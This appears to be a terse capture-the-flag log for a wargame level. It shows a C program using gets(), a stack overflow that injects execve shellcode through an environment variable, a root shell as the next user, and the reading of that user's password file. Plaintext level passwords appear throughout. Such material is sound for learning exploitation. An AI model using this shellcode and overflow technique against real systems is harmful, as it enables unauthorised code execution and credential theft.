#include <stdio.h>
int main(int argc, char *argv[])
{
char buf[64];
printf("Password: ");
gets(buf);
puts("Authentication failure.\nSorry.");
return 0;
}
root@today:~# ssh [email protected]
[email protected]'s password: aesebootiv
behemoth1@melinda:~$ cd /tmp/shui1
behemoth1@melinda:/tmp/shui1$ ls
env env.c sleep
behemoth1@melinda:/tmp/shui1$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')
behemoth1@melinda:/tmp/shui1$ ./env EGG /behemoth/behemoth1
0xffffd89a
behemoth1@melinda:/tmp/shui1$ (python -c 'print "U"*79 + "\x9a\xd8\xff\xff"'; cat) | /behemoth/behemoth1
Password: Authentication failure.
Sorry.
whoami
behemoth2
cat /etc/behemoth_pass/behemoth2
eimahquuof
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804845d <main> push %ebp │
│0x804845e <main+1> mov %esp,%ebp │
│0x8048460 <main+3> and $0xfffffff0,%esp │
│0x8048463 <main+6> sub $0x60,%esp │
│0x8048466 <main+9> movl $0x8048530,(%esp) │
│0x804846d <main+16> call 0x8048310 <printf@plt> │
│0x8048472 <main+21> lea 0x1d(%esp),%eax │
│0x8048476 <main+25> mov %eax,(%esp) │
│0x8048479 <main+28> call 0x8048320 <gets@plt> │
│0x804847e <main+33> movl $0x804853c,(%esp) │
│0x8048485 <main+40> call 0x8048330 <puts@plt> │
│0x804848a <main+45> mov $0x0,%eax │
│0x804848f <main+50> leave │
│0x8048490 <main+51> ret │
└─────────────────────────────────────────────────────────────────────────────────┘
